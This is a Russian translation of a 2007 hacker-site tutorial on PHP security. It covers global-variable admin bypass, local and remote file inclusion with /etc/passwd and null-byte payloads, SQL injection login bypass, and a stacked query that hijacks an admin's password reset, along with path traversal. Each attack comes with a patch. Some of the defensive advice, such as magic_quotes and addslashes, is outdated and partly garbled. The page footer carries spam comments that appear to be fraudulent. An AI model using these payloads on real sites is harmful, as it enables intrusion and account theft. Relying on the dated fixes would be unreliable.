Контакты

Для связи с нами можно использовать:
irc://irc.chatnet.ru:#gfs
icq://546460
email://cobalt[@]gfs-team.ru

Все материалы предоставлены только с ознакомительной целью
ГлавнаяСтатьиПереводыPHP UNDERGROUND
© перевод Robin_HOOD 10.05.2007 статья не оптимизирована

Оригинальную статью на английском можно заценить тут -  
	http://www.playhack.net/view.php?type=1&id=22

[рус.txt  text/plain (10,7KB)]
-[ INFOS ]-----------------------------------------------------------------------

Title: "PHP Undergroud Security"
Author: Omnipresent
E-Mail: omnipresent@email.it - omni@playhack.net
Website: http://omni.playhack.net - http://www.playhack.net
Date: 2007-04-12
 
---------------------------------------------------------------------------------


-[ SUMMARY ]---------------------------------------------------------------------

	0x00: Начнем..
	0x01: Глобальные переменные.. Осторожно
		[*] Patching
	0x02: File Inclusion
		[*] Patching
	0x03: XSS
	0x04: SQL Injection
		\_ 0x04a: Login Bypass
		\_ 0x04b: 1 Query? No.. 2 one!
		[*] Patching
	0x05: File Traverse
		[*] Patching
	0x05: Заключение



---------------------------------------------------------------------------------



---[ 0x00: Let"s start.. ]
	
В этом туториале я объясню основные PHP уязвимости и ошибки, расскажу про то как 
их использовать и не допускать их.

Удачи!


-----------------------------------------------------------------------------[/]


---[ 0x01: Глобальные переменные, осторожнее!]

В PHP не нужно декларировать переменные, это отличная вещ для кодера, переменные 
создаются "автоматически" когда нужно.
Отличная вещь... Иногда
PHP, как известно, также принимает данные от пользователя, обрабатывая их. Если 
мы не определили переменную до её использования могут возникнуть проблемы, 
касающиеся безопасности приложений. Для примера, взглянем на следующий код:


[...]

	if ($is_admin == 1) {
		//Да, я админ, открываем админ.панель
		[...]
	} else {
		//Нет, не админ
		[...]
	}

Как можно увидеть, $is_admin не определена раньше, поэтому мы легко 
можем получить несанкционированный доступ к админ.панели.
Да, но как? Просто:

http://remote_host/bugged.php?is_admin=1

---[ Patching ]---

Как защитится от этого? Просто: задекларировать $is_admin до блока IF, 
примерно так:


$is_admin = 0;

[...]

	if ($is_admin == 1) {
		//Yes, I"m the admin so call the Administration Pannel
		[...]
	} else {
		//No, I"m not the admin
		[...]
	}


-----------------------------------------------------------------------------[/]


---[ 0x02: File Inclusion]


-----[Local File Inclusion]

PHP отличный, мощный язык, но нужно внимательно смотреть за своим кодом дабы 
препятствовать возникновению проблем с безопасностью.
В многих ситуациях очень удобно использовать динамические инклуды, где часть 
пути к файлу находится в переменной, как к примеру

<?php

	include "/users/".$include_path.".php";
	[...]
?>


$include_path не задекларированная до использования, поэтому можно поместить в 
переменную любое значение, к примеру то же  /etc/passwd.
Для этого просто нужно модифицировать include_path в URL; к примеру

http://remote_host/bugged.php?include_path=../../../../etc/passwd%00

В результате мы получим 

<?php

	include "/users/../../../../etc/passwd%00.php"
	[...]
?>

- [ NOTE ] -

А что такое %00? Это означает нулевой символ, который "удаляет" расширение PHP.
Если мы пропустим нулевой байт, мы сможем смотреть ТОЛЬКО .php файлы, потому что 
расширение подключаемого файла - PHP (include "/users/".$include_path.".PHP")


-------------------------------------------------------------------------------

-----[ Remote File Inclusion]

Возьмем следующий код:

<?php

	[...]

		include($_GET["pag"]);

	[...]

?>

Как видим, $page не утверждена до использования, поэтому злоумышленник может 
проинклудить свой скрипт с помощью браузера, и получить доступ к машине, или 
получить листинг к файлам.

Пример один: (доступ к машине)

http://remote_host/inc.php?pag=[Evil Script - our shell located on our server]

Пример 2: (просмотр файлов)

http://remote_host/inc.php?pag=/etc/passwd

---[ Patching ]---

Какое решение? подтверждать ввод. Один из многих методов - создать список 
разрешенных страниц, как показано ниже:

[...]

	$pag = $_GET["pag"];

	$pages = array("index.php", "alfa.php", "beta.php", "gamma.php");
	
		if(in_array($pag, $pages))
		{
			include($pag);
		{
			else
			{
			die("Hacking Attempt!");
			}

[...]


-----------------------------------------------------------------------------[/]

---[ 0x03: XSS]

Хочешь узнать про XSS? 

Мой партнер написал большую статью про это, а я не вижу смысла писать об этом 
дважды, поэтому держите:


	[+] "Cross-Site Scripting for Fun and Profit"
	    http://www.playhack.net/view.php?type=1&id=18

	[+] "Applying XSS to Phishing Attacks"
	    http://www.playhack.net/view.php?type=1&id=20

-----------------------------------------------------------------------------[/]

---[ 0x03: SQL Injection]

С помощью SQL Injection, как видно из названия, можно внедрить произвольный SQL 
Code в уязвимое приложение.


------[ 0x04b Login Bypass ]

До того как мы начнем с небольшого примера, нужно узнать несколько вещей про SQL:

- (")кавычка. В SQL это оператор разграничивает строки, что важно для поиска 
	уязвимостей.

- (#)комментарий. Означает, что мы пытаемся сделать комментарии. Запомните, это 
	важно и нужно!

- (;)Это значит мы делаем новый запрос.. легко

После небольшого перерыва на важные операнды, приступим к первому примеру. Обход 
Логина - Получаем права администратора

<?php

	// login.php
		
	$nick = $_POST["nick"];
	$pass = $_POST["pass"];

	$link = mysql_connect("localhost", "root", "root") or die("Error: ".
		mysql_error());

	mysql_select_db("sql_inj", $link);


$query = mysql_query("SELECT * FROM sql_inj WHERE nick ="".$nick."" 
AND pass ="" .$pass. """, 
$link);

if (mysql_num_rows($query) == 0) {
echo "<script type="text/javascript">window.location.href="index.html";
</script>";
exit;
}

	$logged = 1;

	[...]

	//EoF

	?>

 
Этот скрипт очень простой, но очень полезный, для того чтобы узнать 
немного о SQL Injection.
Как мы видим, переменные $nick и $pass не обработаны должным образом до того
как они были использованы в запросе, поэтому можем вставить код.. наш SQL код.

Посмотрим на запрос: 

"SELECT * FROM sql_inj WHERE nick ="".$nick."" AND pass ="" .$pass. """

Что случится, если мы передадим две переменные, испорченные как тут:

$nick = 1" OR "1" = "1
$pass = 1" OR "1" = "1

Новый запрос будет:

"SELECT * FROM sql_inj WHERE nick ="1 OR "1" = "1" AND pass ="1" OR "1" = "1""

Понятно? нет? Ладно, объясню более понятно..

Если ты хоть немного знаешь о таблицах истинности, тебе будет легко понять..

1 OR 1 = 1 ??

Один или один эквивалентно один? Да, правильно

А кто первый пользователь в таблице  "sql_inj"? 
Тот кто установил приложение? Да! Админ)

Итак, мы вошли как первый пользователь, а первый пользователь - админ=)

Также мы можем задать следующий запрос:

$nick = 1" OR "1" = "1" #
$pass = what_we_want_to_put

Новый запрос будет:

"SELECT * FROM sql_inj WHERE nick ="1 OR "1" = "1" # 
AND pass = what_we_want_to_put"

Как сказано выше, "#" означает что все что идет после оператора, является
 комментарий.
НОВЫЙ запрос:

"SELECT * FROM sql_inj WHERE nick ="1 OR "1" = "1"

И мы опять Админ)

------[ 0x04b: 1 Query? No.. 2 one! ]

С SQL Injection мы можем модифицировать запросы, изменять даты, обновлять 
профили и многое другое...
Посмотрим на следующий код:

<?php

//email.php

[...]

$email = $_POST["email"];

[...]

$query = mysql_query("SELECT email, passwd, user_name FROM users WHERE email = 
"".$email.""");
[...]

?>

Что мы здесь видим? $email не объявлена до использования..отлично!
Мы можем использовать это и.. к примеру, обновить базу данных, вводя новый 
запрос вроде этого:

$email =  x"; UPDATE users SET email = "omnipresent@email.it" 
	  WHERE email = "admin@site.com ";

новый запрос будет такой:

SELECT email, passwd, user_name FROM users 
	WHERE email = " x"; UPDATE users SET email = "omnipresent@email.it" 
	WHERE email = "admin@site.com ";

Здесь, нападающий обновил таблицу "users", изменив админский email на свой.
К примеру, со скриптом "Восстановление пароля", он может ввести свой email
(omnipresent@email.it)
и получить письмо вроде такого:

From: host@site.com
	To: omnipresent@email.it
	Subject: Login Password

	Ehy.. take it ;)

	Username: Admin
	Password: 12345

	Regards,
	Admin


---[ Patching ]---

Для того чтобы пропатчить скрипты мы можем немного изменить php.ini файл:

1. set magic_quotes_gcp to On

  Это позволит избежать кавычки в:
        -COOKIE
	-POST
	-GET

2 использовать addslashes()

  Это позволит экранировать кавычки

3. htmlspecialchars()

  Будет конвертировать спец. символы в HTML формат

4. mysql_escape_string()

   Функция экранирует все спецсимволы в unescaped_string, вследствие чего, 
   её можно безопасно использовать в mysql_query().

5. Смотрите php.net, для использования других фунцкий

6. Проверьте входные данные пользователя, как в примере ниже:

	$user_id = (int)$_GET["user_id"];
	
        $user_id это всегда целое число и можем отбросить ненужные вход. данные 
        для безопасности.



-----------------------------------------------------------------------------[/]


---[ 0x05: File Traverse ]

Треверсинг файловой системы действительно важный и критический баг.

Когда мы используем файл, мы должны индифитицировать имя файла и путь до него в 
указателях до скрипта. Во многих случаях, имя файла задается пользователем, 
аргумент задается в функцию fopen(), как здесь:

<?php

[...]

	$fp = fopen("/path/{$_GET["filename"]}.txt", "r");

[...]

?>

В этом скрипте есть уязвимость, потому что "filename" может быть задано 
удаленным пользователем. In this case the attacker can traveses the
 filesystem by using multiple instances of "../" to move up to the directory 
 tree and see other files.

К примеру: 
http://remote_host/path/bug.php?filename=../../../../path_of_another_file/file%00

Всегда помните, что нулевой байт используется во многих атаках для удаления 
файлового расширения, задаваемого скриптом.

---[ Patching ]---

Отличное решение пропатчить этот скрипт - использовать basename(), как показано
в скрипте ниже:

<?php
 
	$clean = array(); 
	
	if (basename($_GET["filename"]) == $_GET["filename"]) 
		{ 
			$clean["filename"] = $_GET["filename"]; 
		} 
	else 
		{ 

			[...]

		} 

$fp = fopen("/path/{$clean["filename"]}.txt", "r");


?> 

-----------------------------------------------------------------------------[/]


---[ 0x06: Заключение ] 

Это конец статьи "PHP Undergroud Security", и я надеюсь она поможет вам 
обезопасить PHP code!

При любых проблемах пишите на omnipresent@email.it или
omni@playhack.net. 



-----------------------------------------------------------------------------[/]

\======================================[EOF]=====================================/

© milw0rm.com [2007-04-12]



© перевод Robin_HOOD 10.05.2007 статья не оптимизирована

e-Commerce Partners Network
Ник:

Текст:
P Br B I Qute



Код: обновить
Последние комментарии
22.09.2017 18:36:49 Avito777jaf написал:
<b>Пополение баланса Авито (Avito) за 50%</b> | <b>Телеграмм @a1garant</b> <b>Здравствуйте,...
Новый релиз
22.09.2017 18:26:34 Avito777jaf написал:
<b>Пополение баланса Авито (Avito) за 50%</b> | <b>Телеграмм @a1garant</b> <b>Приветствую...
Сайт снова работает!
22.09.2017 18:12:48 Avito777jaf написал:
<b>Пополение баланса Авито (Avito) за 50%</b> | <b>Телеграмм @a1garant</b> <b>Приветствую...
Новая статья
Реклама

Тут должна была быть ваша реклама, но мы потеряли глиняную табличку с ее текстом. SapeId: 665044

Rambler's Top100